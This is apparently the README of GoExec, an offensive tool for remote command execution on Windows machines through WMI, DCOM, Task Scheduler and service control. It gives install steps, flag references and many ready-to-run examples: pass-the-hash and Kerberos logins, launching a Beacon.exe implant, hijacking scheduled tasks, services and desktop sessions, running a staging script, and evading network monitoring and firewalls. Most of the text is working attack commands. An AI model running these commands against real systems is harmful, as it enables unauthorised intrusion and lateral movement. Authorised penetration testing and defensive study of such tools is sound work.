GoExec is a new take on some of the methods used to gain remote execution on Windows devices. GoExec implements a number of largely unrealized execution methods and provides significant OPSEC improvements overall.
The original post about GoExec v0.1.0 can be found here
To build this project from source, you will need Go version 1.23.* or greater and a 64-bit target architecture. More information on managing Go installations can be found here
# Install goexec
go install -ldflags="-s -w" github.com/FalconOpsLLC/goexec@latestFor pre-release features, fetch the latest commit and build manually.
# (Linux) Install GoExec manually from source
# Fetch source
git clone https://github.com/FalconOpsLLC/goexec
cd goexec
# Build goexec (Go >= 1.23)
CGO_ENABLED=0 go build -ldflags="-s -w"
# (Optional) Install goexec to /usr/local/bin/goexec
sudo install ./goexec /usr/local/binWe've provided a Dockerfile to build and run GoExec within Docker containers.
# (Linux) Install GoExec Docker image
# Fetch source
git clone https://github.com/FalconOpsLLC/goexec
cd goexec
# Build goexec image
docker build . --tag goexec --network host
# Run goexec via Docker container
alias goexec='docker run -it --rm --name goexec goexec'
goexec -h # display help menuYou may also download the latest release for 64-bit Windows, macOS, or Linux.
GoExec is made up of modules for each remote service used (i.e. wmi, scmr, etc.), and specific methods within each module (i.e. wmi proc, scmr change, etc.)
Usage:
goexec [command] [flags]
Execution Commands:
dcom Execute with Distributed Component Object Model (MS-DCOM)
wmi Execute with Windows Management Instrumentation (MS-WMI)
scmr Execute with Service Control Manager Remote (MS-SCMR)
tsch Execute with Windows Task Scheduler (MS-TSCH)
Additional Commands:
help Help about any command
completion Generate the autocompletion script for the specified shell
Logging:
-D, --debug Enable debug logging
-O, --log-file file Write JSON logging output to file
-j, --json Write logging output in JSON lines
-q, --quiet Disable info logging
Authentication:
-u, --user user@domain Username ('user@domain', 'domain\user', 'domain/user' or 'user')
-p, --password string Password
-H, --nt-hash hash NT hash ('NT', ':NT' or 'LM:NT')
--aes-key hex key Kerberos AES hex key
--pfx file Client certificate and private key as PFX file
--pfx-password string Password for PFX file
--ccache file Kerberos CCache file name (defaults to $KRB5CCNAME, currently unset)
--dc string Domain controller
-k, --kerberos Use Kerberos authentication
Use "goexec [command] --help" for more information about a command.
Although not recommended for live engagements or monitored environments due to OPSEC concerns, we've included the optional ability to fetch program output via SMB file transfer with the -o flag. Use of this flag will wrap the supplied command in cmd.exe /c ... > \Windows\Temp\RANDOM where RANDOM is a random GUID, then fetch the output file via SMB file transfer.
The wmi module uses remote Windows Management Instrumentation (WMI) to spawn processes (wmi proc), or manually call a method (wmi call).
Usage:
goexec wmi [command] [flags]
Available Commands:
proc Start a Windows process
call Execute specified WMI method
... [inherited flags] ...
Network:
-x, --proxy URI Proxy URI
-F, --epm-filter string String binding to filter endpoints returned
by the RPC endpoint mapper (EPM)
--endpoint string Explicit RPC endpoint definition
--no-epm Do not use EPM to automatically detect RPC
endpoints
--no-sign Disable signing on DCERPC messages
--no-seal Disable packet stub encryption on DCERPC messages
The proc method creates an instance of the Win32_Process WMI class, then calls the Create method to spawn a process with the provided arguments.
Usage:
goexec wmi proc [target] [flags]
Execution:
-e, --exec string Remote Windows executable to invoke
-a, --args string Process command line arguments
-c, --command string Windows process command line (executable &
arguments)
-o, --out string Fetch execution output to file or "-" for
standard output
-m, --out-method string Method to fetch execution output (default "smb")
--no-delete-out Preserve output file on remote filesystem
-d, --directory string Working directory (default "C:\\")
... [inherited flags] ...
# Run an executable without arguments
./goexec wmi proc "$target" \
-u "$auth_user" \
-p "$auth_pass" \
-e 'C:\Windows\Temp\Beacon.exe' \
# Authenticate with NT hash, fetch output from `cmd.exe /c whoami /all`
./goexec wmi proc "$target" \
-u "$auth_user" \
-H "$auth_nt" \
-e 'cmd.exe' \
-a '/C whoami /all' \
-o- # Fetch output to STDOUTThe call method gives the operator full control over a WMI method call. You can list available classes and methods on Windows with PowerShell's Get-CimClass.
Usage:
goexec wmi call [target] [flags]
WMI:
-n, --namespace string WMI namespace (default "//./root/cimv2")
-C, --class string WMI class to instantiate (i.e. "Win32_Process")
-m, --method string WMI Method to call (i.e. "Create")
-A, --args string WMI Method argument(s) in JSON dictionary format (i.e. {"Command":"calc.exe"}) (default "{}")
... [inherited flags] ...
# Call StdRegProv.EnumKey - enumerate registry subkeys of HKLM\SYSTEM
./goexec wmi call "$target" \
-u "$auth_user" \
-p "$auth_pass" \
-C 'StdRegProv' \
-m 'EnumKey' \
-A '{"sSubKeyName":"SYSTEM"}'The dcom module uses exposed Distributed Component Object Model (DCOM) objects to spawn processes.
Warning
The DCOM module is generally less reliable than other modules because the underlying methods are often reliant on the target Windows version and specific Windows settings.
Usage:
goexec dcom [command] [flags]
Available Commands:
mmc Execute with the MMC20.Application DCOM object
shellwindows Execute with the ShellWindows DCOM object
shellbrowserwindow Execute with the ShellBrowserWindow DCOM object
... [inherited flags] ...
Network:
-x, --proxy URI Proxy URI
-F, --epm-filter string String binding to filter endpoints returned
by the RPC endpoint mapper (EPM)
--endpoint string Explicit RPC endpoint definition
--no-epm Do not use EPM to automatically detect RPC
endpoints
--no-sign Disable signing on DCERPC messages
--no-seal Disable packet stub encryption on DCERPC messages
The mmc method uses the exposed MMC20.Application object to call Document.ActiveView.ShellExec, and ultimately spawn a process on the remote host.
Usage:
goexec dcom mmc [target] [flags]
Execution:
-e, --exec string Remote Windows executable to invoke
-a, --args string Process command line arguments
-c, --command string Windows process command line (executable &
arguments)
-o, --out string Fetch execution output to file or "-" for
standard output
-m, --out-method string Method to fetch execution output (default "smb")
--no-delete-out Preserve output file on remote filesystem
--directory directory Working directory (default "C:\\")
--window string Window state (default "Minimized")
... [inherited flags] ...
# Authenticate with NT hash, fetch output from `cmd.exe /c whoami /priv` to file
./goexec dcom mmc "$target" \
-u "$auth_user" \
-H "$auth_nt" \
-e 'cmd.exe' \
-a '/c whoami /priv' \
-o ./privs.bin # Save output to ./privs.binThe shellwindows method uses the ShellWindows DCOM object to call Item().Document.Application.ShellExecute and spawn a remote process. This execution method isn't nearly as stable as the dcom mmc method for a few reasons:
- This method may not work on the latest Windows versions
- It may require that there is an active desktop session on the target machine.
- Successful execution may be on behalf of the desktop user, not necessarily an administrator.
Usage:
goexec dcom shellwindows [target] [flags]
Execution:
-e, --exec string Remote Windows executable to invoke
-a, --args string Process command line arguments
-c, --command string Windows process command line (executable & arguments)
-o, --out string Fetch execution output to file or "-" for standard output
-m, --out-method string Method to fetch execution output (default "smb")
--no-delete-out Preserve output file on remote filesystem
--directory directory Working directory (default "C:\\")
--app-window ID Application window state ID (default "0")
... [inherited flags] ...
The app window argument (--app-window) must be one of the values described here (vShow parameter).
# Authenticate with local admin NT hash, execute `netstat.exe -anop tcp` w/ output
./goexec dcom shellwindows "$target" \
-u "$auth_user" \
-H "$auth_nt" \
-e 'netstat.exe' \
-a '-anop tcp' \
-o- # write to standard output
# Authenticate with local admin password, open maximized notepad window on desktop
./goexec dcom shellwindows "$target" \
-u "$auth_user" \
-p "$auth_pass" \
-e 'notepad.exe' \
--directory 'C:\Windows' \
--app-window 3 # MaximizedThe shellbrowserwindow method uses the exposed ShellBrowserWindow DCOM object to call Document.Application.ShellExecute and spawn the provided process. The potential constraints of this method are similar to the ShellWindows method.
Usage:
goexec dcom shellbrowserwindow [target] [flags]
Execution:
-e, --exec string Remote Windows executable to invoke
-a, --args string Process command line arguments
-c, --command string Windows process command line (executable & arguments)
-o, --out string Fetch execution output to file or "-" for standard output
-m, --out-method string Method to fetch execution output (default "smb")
--no-delete-out Preserve output file on remote filesystem
--directory directory Working directory (default "C:\\")
--app-window ID Application window state ID (default "0")
... [inherited flags] ...
# Authenticate with NT hash, open explorer.exe maximized
./goexec dcom shellbrowserwindow "$target" \
-u "$auth_user@$domain" \
-H "$auth_nt" \
-e 'explorer.exe' \
--app-window 3The tsch module makes use of the Windows Task Scheduler service (MS-TSCH) to spawn processes on the remote target.
Usage:
goexec tsch [command] [flags]
Available Commands:
demand Register a remote scheduled task and demand immediate start
create Create a remote scheduled task with an automatic start time
change Modify an existing task to spawn an arbitrary process
... [inherited flags] ...
Network:
-x, --proxy URI Proxy URI
-F, --epm-filter string String binding to filter endpoints returned by the RPC endpoint mapper (EPM)
--endpoint string Explicit RPC endpoint definition
--no-epm Do not use EPM to automatically detect RPC endpoints
--no-sign Disable signing on DCERPC messages
--no-seal Disable packet stub encryption on DCERPC messages
The create method registers a scheduled task using SchRpcRegisterTask with an automatic start time via TimeTrigger, and optional automatic deletion with the DeleteExpiredTaskAfter setting.
Usage:
goexec tsch create [target] [flags]
Task Scheduler:
-t, --task string Name or path of the new task
--delay-stop duration Delay between task execution and termination. This won't stop the spawned process (default 5s)
--start-delay duration Delay between task registration and execution (default 5s)
--no-delete Don't delete task after execution
--call-delete Directly call SchRpcDelete to delete task
--sid SID User SID to impersonate (default "S-1-5-18")
Execution:
-e, --exec string Remote Windows executable to invoke
-a, --args string Process command line arguments
-c, --command string Windows process command line (executable & arguments)
-o, --out string Fetch execution output to file or "-" for standard output
-m, --out-method string Method to fetch execution output (default "smb")
--no-delete-out Preserve output file on remote filesystem
... [inherited flags] ...
# Authenticate with NT hash via Kerberos, register task at \Microsoft\Windows\GoExec, execute `C:\Windows\Temp\Beacon.exe`
./goexec tsch create "$target" \
--user "${auth_user}@${domain}" \
--nt-hash "$auth_nt" \
--dc "$dc_ip" \
--kerberos \
--task '\Microsoft\Windows\GoExec' \
--exec 'C:\Windows\Temp\Beacon.exe'Similar to the create method, the demand method will call SchRpcRegisterTask, but rather than setting a defined time when the task will start, it will additionally call SchRpcRun to forcefully start the task. This method can additionally hijack desktop sessions when provided the session ID with --session.
Usage:
goexec tsch demand [target] [flags]
Task Scheduler:
-t, --task string Name or path of the new task
--session uint32 Hijack existing session given the session ID
--sid string User SID to impersonate (default "S-1-5-18")
--no-delete Don't delete task after execution
Execution:
-e, --exec string Remote Windows executable to invoke
-a, --args string Process command line arguments
-c, --command string Windows process command line (executable & arguments)
-o, --out string Fetch execution output to file or "-" for standard output
-m, --out-method string Method to fetch execution output (default "smb")
--no-delete-out Preserve output file on remote filesystem
... [inherited flags] ...
# Use random task name, execute `notepad.exe` on desktop session 1
./goexec tsch demand "$target" \
--user "$auth_user" \
--password "$auth_pass" \
--exec 'notepad.exe' \
--session 1
# Authenticate with NT hash via Kerberos,
# register task at \Microsoft\Windows\GoExec (will be deleted),
# execute `C:\Windows\System32\cmd.exe /c set` with output
./goexec tsch demand "$target" \
--user "${auth_user}@${domain}" \
--nt-hash "$auth_nt" \
--dc "$dc_ip" \
--kerberos \
--task '\Microsoft\Windows\GoExec' \
--exec 'C:\Windows\System32\cmd.exe' \
--args '/c set' \
--out -The change method calls SchRpcRetrieveTask to fetch the definition of an existing
task (-t/--task), then modifies the task definition to spawn a process before restoring the original.
Usage:
goexec tsch change [target] [flags]
Task Scheduler:
-t, --task string Path to existing task
--no-start Don't start the task
--no-revert Don't restore the original task definition
Execution:
-e, --exec string Remote Windows executable to invoke
-a, --args string Process command line arguments
-c, --command string Windows process command line (executable & arguments)
-o, --out string Fetch execution output to file or "-" for standard output
-m, --out-method string Method to fetch execution output (default "smb")
--no-delete-out Preserve output file on remote filesystem
... [inherited flags] ...
# Enable debug logging, Modify "\Microsoft\Windows\UPnP\UPnPHostConfig" to run `cmd.exe /c whoami /all` with output
./goexec tsch change $target --debug \
-u "${auth_user}" \
-p "${auth_pass}" \
-t '\Microsoft\Windows\UPnP\UPnPHostConfig' \
-e 'cmd.exe' \
-a '/C whoami /all' \
-o >(tr -d '\r') # Send output to another program (zsh/bash)The SCMR module works a lot like smbexec.py, but it provides additional RPC transports to evade network monitoring or firewall rules, and some minor OPSEC improvements overall.
Warning
The scmr module cannot fetch process output at the moment. This will be added in a future release.
Usage:
goexec scmr [command] [flags]
Available Commands:
create Spawn a remote process by creating & running a Windows service
change Change an existing Windows service to spawn an arbitrary process
delete Delete an existing Windows service
... [inherited flags] ...
Network:
-x, --proxy URI Proxy URI
-F, --epm-filter string String binding to filter endpoints returned by the RPC endpoint mapper (EPM)
--endpoint string Explicit RPC endpoint definition
--no-epm Do not use EPM to automatically detect RPC endpoints
--no-sign Disable signing on DCERPC messages
--no-seal Disable packet stub encryption on DCERPC messages
The create method is used to spawn a process by creating a Windows service. This method requires the full path to a remote executable (i.e. C:\Windows\System32\calc.exe)
Usage:
goexec scmr create [target] [flags]
Execution:
-f, --executable-path string Full path to a remote Windows executable
-a, --args string Arguments to pass to the executable
Service:
-n, --display-name string Display name of service to create
-s, --service string Name of service to create
--no-delete Don't delete service after execution
--no-start Don't start service
# Use MSRPC instead of SMB, use custom service name, execute `cmd.exe`
./goexec scmr create "$target" \
-u "${auth_user}@${domain}" \
-p "$auth_pass" \
-f 'C:\Windows\System32\cmd.exe' \
-F 'ncacn_ip_tcp:'
# Directly dial svcctl named pipe ("ncacn_np:[svcctl]"),
# use random service name,
# execute `C:\Windows\System32\calc.exe`
./goexec scmr create "$target" \
-u "${auth_user}@${domain}" \
-p "$auth_pass" \
-f 'C:\Windows\System32\calc.exe' \
--endpoint 'ncacn_np:[svcctl]' --no-epmThe SCMR module's change method executes programs by modifying existing Windows services using the RChangeServiceConfigW method rather than calling RCreateServiceW like scmr create. The modified service is restored to its original state after execution
Warning
Using this module on important Windows services may brick the OS. Try using a less important service like PlugPlay.
Usage:
goexec scmr change [target] [flags]
Service Control:
-s, --service-name string Name of service to modify
--no-start Don't start service
Execution:
-f, --executable-path string Full path to remote Windows executable
-a, --args string Arguments to pass to executable
# Used named pipe transport, Modify the PlugPlay service to execute `C:\Windows\System32\cmd.exe /c C:\Windows\Temp\stage.bat`
./goexec scmr change $target \
-u "$auth_user" \
-p "$auth_pass" \
-F "ncacn_np:" \
-s PlugPlay \
-f 'C:\Windows\System32\cmd.exe' \
-a '/c C:\Windows\Temp\stage.bat'The SCMR module's auxiliary delete method will simply delete the provided service.
Usage:
goexec scmr delete [target] [flags]
Service Control:
-s, --service-name string Name of service to delete
- @oiweiwei for the wonderful go-msrpc module
- @RedTeamPentesting and Erik Geiser for the adauth module
- The developers and contributors of Impacket for the inspiration and technical reference